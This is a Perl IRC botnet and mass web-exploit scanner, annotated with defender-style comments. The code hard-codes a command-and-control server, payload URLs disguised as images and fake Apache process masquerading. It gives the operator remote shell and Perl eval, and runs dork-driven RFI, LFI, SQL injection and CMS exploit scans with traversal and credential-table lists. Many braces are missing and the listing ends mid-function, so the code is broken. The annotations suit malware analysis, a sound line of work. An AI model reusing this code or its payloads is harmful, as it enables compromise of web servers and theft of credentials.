
#!

/usr/bin/perl

################################################

use HTTP::Request; #

use HTTP::Request::Common; #

use HTTP::Request::Common qw(POST); #

use LWP::Simple; #

use LWP 5.53; #

use LWP::UserAgent; #

use Socket; #

use IO::Socket; #

use IO::Socket::INET; #

use IO::Select; #

use MIME::Base64; #

################################################

# --- Hard-coded operator configuration -------------------------------------
# For a defender, the host names, nick, channel and URLs below are the
# indicators worth extracting from this sample (DNS/proxy logs, outbound IRC).

# Captured once at startup; the CTCP TIME reply later in the file sends this
# value, so it reports the start time rather than the current time.
my $datetime = localtime;

# Written into $0 further down so that `ps` shows this command line instead
# of a perl script.
my $fakeproc = "/usr/sbin/apache3 -k start";

# IRC command-and-control server; replaced by $ARGV[0] when one is given.
my $ircserver = "irc.byroe.net";

my $ircport = "6667";
# Nick requested on connect and ident used in the USER line.
my $nickname = "timlopus";

my $ident = "jems";

# Channel joined after the server's 001 welcome.
my $channel = "#kabo";

# Nick that receives the "im here" PRIVMSG and copies of scan hits.
# presumably also what isAdmin() compares against; isAdmin is not in this listing.
my $admin = "Susis";

# Not referenced in the visible part of the file.
my $fullname = "Susis IRC Scanner";

# Output tags, one per scan type. The "#15,1" style sequences look like mIRC
# colour codes whose control byte was rendered as '#' by the page extraction
# -- TODO confirm against an original copy.
my $nob0dy = "#15,1(#4@#9AspAlt#15)#";

my $lfilogo = "#15,1(#4@#9LFI#15)";

my $rfilogo = "#15,1(#4@#9RFI#15)";

my $xmllogo = "#15,1(#4@#9XML#15)";

my $sqllogo = "#15,1(#4@#9SQL#15)";

my $oscologo = "#15,1(#4@#9OSCO#15)";

my $zenlogo = "#15,1(#4@#9ZEN#15)";

my $oplogo = "#15,1(#4@#9OPEN#15)";

my $lokologo = "#15,1(#4@#9LOKO#15)";

my $thumblogo = "#15,1(#4@#9TIMTHUMB#15)";

# Command triggers. The message loop interpolates these into regexes that are
# matched against incoming PRIVMSG text.
my $lficmd = '!lfi';

my $rficmd = '!rfi';
my $xmlcmd = '!xml';

my $sqlcmd = '!sql';

my $oscocmd = '!osco';

my $zencmd = '!zen';

my $lokocmd = '!loko';

my $opcmd = '!op';

my $thumbcmd = '!thumb';

my $cmdlfi = '!cmdlfi';

my $cmdxml = '!cmdxml';

# Remote payload locations. The .jpg names are renamed to .php or run with
# `php` by the payload strings later in the file, so the extension says
# nothing about the content. Treat all four URLs as network indicators.
my $injector = "http://www.kms4u.co.kr/data/cheditor/1704/ipays.jpg";

my $botshell = "http://apnewstime.com//wp-includes/js/byroe.jpg";

my $botshell2 = "http://apnewstime.com//wp-includes/js/allnet.jpg";

# Not referenced in the visible part of the file.
my $thumbshell = "http://blogger.com.papetariechic.ro/jack.php";

my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22


(compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows
95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible;
MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17;
Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0
(compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN
2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0
(compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b;
Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket
Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC;
240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE;
Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1;
rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online
Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America
Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser
(http://www.avantbrowser.com)","Avant Browser
(http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR
1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux;
20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686;
fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720
Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)
Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12)
Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5)
Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6)
Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8)
Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9)
Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X
Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0
(Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915
Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4)
Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;
rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl;
rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows
NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U;
BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows;
U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0
(Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710
Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1)
Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US;
rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0
(X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en]
(OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I;
PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)");

# One User-Agent is picked at random from @uagents when the script starts.
# Every entry in that list is a long-obsolete browser string, which is itself
# a usable signal in web access logs.
my $uagent = $uagents[rand(scalar(@uagents))];

# Directory-traversal suffix ending in /proc/self/environ plus a URL-encoded
# NUL byte. The !cmdlfi handlers append it to the supplied URL. Requests
# carrying this pattern are a ready-made WAF / log-review signature.
# NOTE(review): the line break inside the literal looks like page wrapping.
my $lfdtest =
"../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
environ%00";

# Path of the FCKeditor connector test page requested on candidate hosts.
my $open_test =
"/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";

# Page titles; presumably compared with fetched content to confirm an exposed
# FCKeditor file manager -- the comparison itself is not in this listing.
my $loko_output = ("FCKeditor - Resources Browser");


my $open_output = ("FCKeditor - Connectors Tests");

my @tabele =
('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',

'name','names','nombre','nombres','usuarios','member','members','admin_table','miem
bro','miembros','membername','admins','administrator',

'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','u
ser_password','user_passwords','user_name','user_names',

'member_password','mods','mod','moderators','moderator','user_email','user_emails',
'user_mail','user_mails','mail','emails','email','address',

'e-
mail','emailaddress','correo','correos','phpbb_users','log','logins','login','regis
ters','register','usr','usrs','ps','pw','un','u_name','u_pass',

'tpassword','tPassword','u_password','nick','nicks','manager','managers','administr
ador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id
',

'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','
tb_administrator','tb_login','tb_logon','tb_members_tb_member',

'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','m
embros','utilizadores','staff','nuke_authors','accounts','account','accnts',

'associated','accnt','customers','customer','membres','administrateur','utilisateur
','tuser','tusers','utilisateurs','password','amministratore','god','God','authors'
,

'asociado','asociados','autores','membername','autor','autores','Users','Admin','Me
mbers','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','U
SUARIO','USUARIOS','MIEMBROS','MIEMBRO');

my @kolumny =
('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','mem
bros','utilizadores','sysadmin','email',

'user_name','username','name','user','user_name','user_username','uname','user_unam
e','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','
nombre','login_id','usr','sistema_id','author',

'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_pas
sword','autores','pass_hash','hash','pass','correo',

'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','u
ser_passw','pwrd','user_pwrd','pwd','authors',

'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor'
,'upassword','web_password','web_username');

# Ignore the usual termination signals so the process survives Ctrl-C,
# terminal hang-up and a plain `kill`. SIGKILL cannot be ignored, so
# `kill -9` still works during clean-up. Ignoring CHLD also means forked
# scan children are not left as zombies.
$SIG{'INT'} = 'IGNORE';

$SIG{'HUP'} = 'IGNORE';

$SIG{'TERM'} = 'IGNORE';

$SIG{'CHLD'} = 'IGNORE';

# NOTE(review): 'PS' is not a POSIX signal name; this assignment appears to
# have no effect -- confirm.
$SIG{'PS'} = 'IGNORE';

# Optional first command-line argument replaces the hard-coded IRC server.
$ircserver = "$ARGV[0]" if $ARGV[0];

# Process-name masquerade: overwrite the visible command line with $fakeproc
# followed by 16 NUL bytes (`x` binds tighter than `.`). Detection: the
# executable behind the PID (/proc/<pid>/exe) is still perl and will not
# match the claimed Apache path.
$0 = "$fakeproc"."\0" x 16;;

# Detach: the parent exits at once and the child carries on in the background.
my $pid = fork;

exit if $pid;

# Reached only when fork failed ($pid is undef).
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);

# Keyed by socket: host, port, nick and local address of each IRC connection.
our %irc_servers;

# Not used in the visible part of the file.
our %DCC;

# Indirect-object call; not used in the visible part of the file.
my $dcc_sel = new IO::Select->new();

# Undeclared package global (the file has no `use strict`); holds every IRC
# socket polled by the main loop.
$sel_client = IO::Select->new();
# sendraw([$socket,] $line): write one raw IRC protocol line.
# With two arguments ($#_ is 1) the first is the socket to write to; otherwise
# the single argument goes to the global $IRC_cur_socket.
# The text is interpolated unchanged and terminated with "\n" only.
# NOTE(review): the closing braces of the else branch and of this sub are
# missing from the listing, so the file does not parse as shown.
sub sendraw {

if ($#_ == '1') {

my $socket = $_[0];

print $socket "$_[1]\n";

} else {

print $IRC_cur_socket "$_[0]\n";

# connector($nick, $server, $port): open the TCP connection to the IRC server
# and register on it.
# Returns 1 when the socket cannot be created. On success it records the
# connection in %irc_servers, adds it to $sel_client, then sends NICK (through
# nick(), defined outside this listing) and USER.
sub connector {

my $mynick = $_[0];

my $ircserver_con = $_[1];

my $ircport_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);

if (defined($IRC_socket)) {

# Becomes the default target for sendraw().
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);

$sel_client->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;

nick("$mynick");

# Sent as the "real name" field of USER. It is a fixed string, so it can be
# matched on the wire or in IRC server logs.
my $versi = "##9,1[#!#]# ###1,15 ##M##aza ##C##reW ##9,1 #[#!#]#";

# The USER line also discloses the host's local socket address to the server.
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");

sleep (1);}}

# parse($line): react to one server protocol line (keep-alive, nick tracking
# and the post-registration join).
# NOTE(review): several closing braces are missing from this listing (before
# each `elsif` and at the end of the sub), so the branch nesting shown here is
# not what the original file had.
sub parse {

my $servarg = shift;

# Answer PING with the same token to keep the connection alive.
if ($servarg =~ /^PING \:(.*)/) {

sendraw("PONG :$1");

# NICK change notice: when the old nick is ours, track the new one.
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {

if (lc($1) eq lc($mynick)) {

$mynick = $4;

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

# Numeric 433 (nickname in use): ask for the nick with a suffix appended.
# int rand(1) always evaluates to 0.
elsif ($servarg =~ m/^\:(.+?)\s+433/i) {

nick("$mynick".int rand(1));
}

# Numeric 001 (welcome): registration succeeded. Record the assigned nick and
# server name, set user mode +i, join the control channel and announce to the
# admin nick. The fixed "Hi <admin> im here !!!" text is a network signature.
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {

$mynick = $2;

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;

$irc_servers{$IRC_cur_socket}{'nome'} = "$1";

sendraw("MODE $mynick +i");

sendraw("JOIN $channel");

sleep(2);

sendraw("PRIVMSG $admin :Hi $admin im here !!!");

# Carries an incomplete trailing line from one read to the next.
my $line_temp;

# Main event loop; never exits on its own.
while( 1 ) {

# With no live connection, call connector() again straight away. connector()
# returns 1 on failure and there is no back-off here, so an unreachable server
# shows up as a rapid stream of outbound connection attempts.
while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver",


"$ircport"); }

# 10 ms sleep between polls.
select(undef, undef, undef, 0.01);;

delete($irc_servers{''}) if (defined($irc_servers{''}));

# Non-blocking poll of all IRC sockets.
my @ready = $sel_client->can_read(0);

next unless(@ready);

foreach $fh (@ready) {


$IRC_cur_socket = $fh;

$mynick = $irc_servers{$IRC_cur_socket}{'nick'};

# Read up to 4096 bytes; the buffer may hold several protocol lines.
$nread = sysread($fh, $ircmsg, 4096);

# Zero bytes means the server closed the connection: forget the socket.
# NOTE(review): the closing brace of this `if` is missing from the listing.
if ($nread == 0) {

$sel_client->remove($fh);

$fh->close;

delete($irc_servers{$fh});

@lines = split (/\n/, $ircmsg);

$ircmsg =~ s/\r\n$//;

# PRIVMSG dispatcher. The regex runs against the whole read buffer rather than
# the per-line split. It captures the sender's nick, ident and host, the
# target ($path: a channel name or this bot's nick) and the message text.
# NOTE(review): most `if` blocks below have lost their closing brace in this
# listing; they read as independent tests, not as nested ones.
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {

my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);

# Comma-separated names of the search engines handed to scan_start().
my $engine
="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe
,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,Wa
LLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";

# Target is the bot's own nick, i.e. a private message.
if ($path eq $mynick) {

# CTCP-style replies. The '#' around PING/VERSION/TIME presumably stands for
# the CTCP delimiter byte lost in extraction -- TODO confirm. The VERSION
# reply claims to be an mIRC client.
if ($msg =~ /^#PING (.*)#/) {

sendraw("NOTICE $nick :#PING $1#");

if ($msg =~ /^#VERSION#/) {
sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");

if ($msg =~ /^#TIME#/) {

sendraw("NOTICE $nick :#TIME ".$datetime."#");

# Operator commands. Each is gated only by isAdmin($nick); isAdmin() and
# shell() are defined outside this listing.
# !die kills this process; !killall kills every perl process on the host.
if (&isAdmin($nick) && $msg eq "!die") {

&shell("$path","kill -9 $$");

if (&isAdmin($nick) && $msg eq "!killall") {

&shell("$path","killall -9 perl");

if (&isAdmin($nick) && $msg eq "!reset") {

sendraw("QUIT :Restarting...");

if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

sendraw("JOIN #".$1);

if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

sendraw("PART #".$1);
}

if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {

sendraw("NICK ".$1);

# Reports the masquerade process name and the real PID to the operator.
if (&isAdmin($nick) && $msg =~ /^!pid/) {

sendraw($IRC_cur_socket, "PRIVMSG $nick :#9,1Fake Process/PID :


$fakeproc - $$");

# Any private message from the operator that does not start with '!' is
# passed to shell() as a command: remote command execution on this host.
if (&isAdmin($nick) && $msg !~ /^!/) {

&shell("$nick","$msg");

# !cmdlfi <url> <cmd>: append the traversal suffix to the URL and hand both
# to cmdlfi() (defined outside this listing).
if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){

my $url = $1.$lfdtest;

my $cmd = $2;

&cmdlfi($url,$cmd,$nick);

if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){

my $url = $1;

my $cmd = $2;

&cmdxml($url,$cmd,$nick);

}
}

# Channel branch: the PRIVMSG target is not the bot's nick.
# NOTE(review): closing braces are missing throughout, as elsewhere in this
# listing.
else {

if (&isAdmin($nick) && $msg eq "!die") {

&shell("$path","kill -9 $$");

if (&isAdmin($nick) && $msg eq "!killall") {

&shell("$path","killall -9 perl");

if (&isAdmin($nick) && $msg eq "!reset") {

sendraw("QUIT :Restarting...");

if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {

sendraw("JOIN #".$1);

if (&isAdmin($nick) && $msg eq "!part") {

sendraw("PART $path");

if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {

sendraw("PART #".$1);
}

# ".sh <cmd>" and "<botnick> <cmd>" both pass the text to shell(), with
# output directed to the channel.
if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {

&shell("$path","$1");

if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {

&shell("$path","$1");

# String eval of operator-supplied text: arbitrary Perl runs inside the bot
# process with its privileges.
if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {

eval "$1";

##################################################################### HIT

# As written, these two handlers carry no isAdmin() test, unlike their
# private-message counterparts.
if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){

my $url = $1.$lfdtest;

my $cmd = $2;

&cmdlfi($url,$cmd,$path);

if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){

my $url = $1;

my $cmd = $2;
&cmdxml($url,$cmd,$path);

##################################################################### HELP COMMAND

if ($msg=~ /^!help/) {

my $helplogo = "#15,1(#4@#9Help#15)";

&msg("$path","$helplogo #14
######################9[HELP]#14###############################");

&msg("$path","$helplogo #7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|
$thumbcmd [bug][dork]|!portscan[ip][port]) )#");

&msg("$path","$helplogo #7 ( $cmdlfi|$cmdxml) [target][cmd] )


#");

&msg("$path","$helplogo #7 ( $zencmd | $oscocmd | $lokocmd |


$opcmd [dork] ) #");sleep(2);

&msg("$path","$helplogo #7 ( !about|!engine|!version|!pid )#");

&msg("$path","$helplogo #14 #######################9[END


HELP]#14##########################");

if ($msg=~ /^!engine/) {

my $enginelogo = "#15,1(#4@#9EnginE#15)";

&msg("$path","$enginelogo #4
GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio#");
&msg("$path","$enginelogo #4
WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo#");

&msg("$path","$enginelogo #4
BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR#");

if ($msg=~ /^!about/) {

my $aboutlogo = "#15,1(#4@#9About Bot#15)";

&msg("$path","$aboutlogo #9Nob0dy Priv8 Scanner SE v1.2 Coded


by Vrs-hCk#");

&msg("$path","$aboutlogo #13CoDeD by c0li ByroeNet#");

&msg("$path","$aboutlogo #7Modified by ipays ByroeNet#");

if ($msg=~ /^!version/) {

my $versionlogo = "#15,1(#4@#9Version#15)";

&msg("$path","$versionlogo #13 priv8 SE v1.2#");

if ($msg=~ /^!respon/ || $msg=~ /^!id/) {

if (&isFound($injector,"html")) {

&msg("$path","#15,1(#4@#9Injector#15)#13 PHP Shell


#9READY!!!");

} else {

&msg("$path","#15,1(#4@#9Injector#15)#13 PHP Shell


#4LOST!!!");
}

if (&isAdmin($nick) && $msg =~ /^!pid/) {

&notice("$nick","#9,1Fake Process/PID : #8$fakeproc - $$");

##################################################################### RFI SCAN

if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ($1,$2);

&msg("$path","$rfilogo #9Dork :#4 $dork");

&msg("$path","$rfilogo #13Bugz :#4 $bug");

&msg("$path","$rfilogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,1);
} else {

&msg("$path","[# $nick #] $rfilogo #4PHP Shell Not


Found!");

exit;

##################################################################### LFI SCAN

if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ($1,$2);

&msg("$path","$lfilogo #9Dork :#4 $dork");


&msg("$path","$lfilogo #13Bugz :#4 $bug");

&msg("$path","$lfilogo #8Search Engine


Loading ...");

&scan_start($path,$bug,$dork,$engine,2);

} else {

&msg("$path","[# $nick #] $lfilogo #4PHP Shell Not


Found!");

exit;

##################################################################### XML SCAN

if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);

&msg("$path","$xmllogo #9Dork :#4 $dork");

&msg("$path","$xmllogo #13Bugz :#4 $bug");

&msg("$path","$xmllogo #8Search Engine


Loading ...");

&scan_start($path,$bug,$dork,$engine,3);

} else {

&msg("$path","[# $nick #] $xmllogo #4PHP Shell Not


Found!");

exit;

##################################################################### SQL SCAN

if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);
}

else {

if (fork) { exit; } else {

my ($bug,$dork) = ($1,$2);

&msg("$path","$sqllogo #9Dork :#4 $dork");

&msg("$path","$sqllogo #13Bugz :#4 $bug");

&msg("$path","$sqllogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,4);

exit;

##################################################################### OSCO SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {
if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ("admin/categories.php/login.php?
cPath=&action=new_product_preview",$1);

&msg("$path","$oscologo #9Dork :#4 $dork");

&msg("$path","$oscologo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,5);

} else {

&msg("$path","[# $nick #] $oscologo #4PHP Shell Not


Found!");

exit;

##################################################################### OSCO SCAN

if ($msg=~ /^$oscocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);
}

else {

if (fork) { exit; } else {

if (&isFound($injector,"SkFOQ09L=")) {

my ($bug,$dork) = ("admin/file_manager.php/login.php",
$1);

&scan_start($path,$bug,$dork,$engine,5);

} else {

&msg("$path","[# $nick #] $oscologo #4PHP Shell Not


Found!");

exit;

##################################################################### LOKO SCAN

if ($msg=~ /^$lokocmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);
}

else {

if (fork) { exit; } else {

my ($bug,$dork) = ("filemanager/browser.html",$1);

&msg("$path","$lokologo #9Dork :#4 $dork");

&msg("$path","$lokologo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,6);

exit;

##################################################################### OPENCART SCAN

if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {


my ($bug,$dork) = ($1,$2);

&msg("$path","$oplogo #9Dork :#4 $dork");

&msg("$path","$oplogo #13Bugz :#4 $bug");

&msg("$path","$oplogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,7);

exit;

##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

my ($bug,$dork) =
("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);

&msg("$path","$zenlogo #9Dork :#4 $dork");


&msg("$path","$zenlogo #13Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,8);

exit;

##################################################################### ZEN SCAN

if ($msg=~ /^$zencmd\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

my ($bug,$dork) = ("admin/record_company.php",$1);

&scan_start($path,$bug,$dork,$engine,8);

exit;

}
##################################################################### TIMTHUMB.PHP
SCAN (ADDED)

if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {

if (my $pid = fork) {

waitpid($pid, 0);

else {

if (fork) { exit; } else {

my ($bug,$dork) = ($1,$2);

&msg("$path","$thumblogo #9Dork :#4 $dork");

&msg("$path","$thumblogo #13Bugz :#4 $bug");

&msg("$path","$thumblogo #8Search Engine Loading ...");

&scan_start($path,$bug,$dork,$engine,9);

exit;

#####################################################################

}
}

# Feed each line of the last read to parse(). A read can end in the middle of
# a protocol line, so the final fragment is kept in $line_temp and prepended
# to the first line of the next read.
for(my $c=0; $c<= $#lines; $c++) {

$line = $lines[$c];

$line = $line_temp.$line if ($line_temp);

$line_temp = '';

$line =~ s/\r$//;

# Every line except the last is complete.
unless ($c == $#lines) {

&parse("$line");

} else {

# The last line counts as complete when it is the only one, when it still
# ended in \r before stripping, or when it is a server "NOTICE AUTH" banner.
if ($#lines == 0) {

&parse("$line");

} elsif ($lines[$c] =~ /\r$/) {

&parse("$line");

} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {

&parse("$line");

} else {

# Otherwise keep it for the next read.
$line_temp = $line;

}
}

#########################################

# type($chan, $bug, $dork, $engine, $type): dispatch one scan job to the
# routine for its numeric type.
#   1 rfi, 2 lfi, 3 xml, 4 sql, 5 osco, 6 loko, 7 op, 8 zen, 9 thumb
# Any other value does nothing. The empty prototype is bypassed because every
# visible caller uses the &type(...) form.
# NOTE(review): the sub's closing brace is missing from this listing.
sub type () {

my ($chan,$bug,$dork,$engine,$type) = @_;

if ($type == 1){&rfi($chan,$bug,$dork,$engine);}

elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);}

elsif ($type == 3){&xml($chan,$bug,$dork,$engine);}

elsif ($type == 4){&sql($chan,$bug,$dork,$engine);}

elsif ($type == 5){&osco($chan,$bug,$dork,$engine);}

elsif ($type == 6){&loko($chan,$bug,$dork,$engine);}

elsif ($type == 7){&op($chan,$bug,$dork,$engine);}

elsif ($type == 8){&zen($chan,$bug,$dork,$engine);}

elsif ($type == 9){&thumb($chan,$bug,$dork,$engine);}

sub scan_start() {

my ($chan,$bug,$dork,$engine,$type) = @_;
if ($engine =~ /google/i) {

if (my $pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"GooGLe",$type);

} exit; }

if ($engine =~ /google2/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"GooGle2",$type);

} exit; }

if ($engine =~ /bing/i) {

if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"Bing",$type);

} exit; }

}
if ($engine =~ /altavista/i) {

if ($pid = fork) { waitpid($pid, 0); }

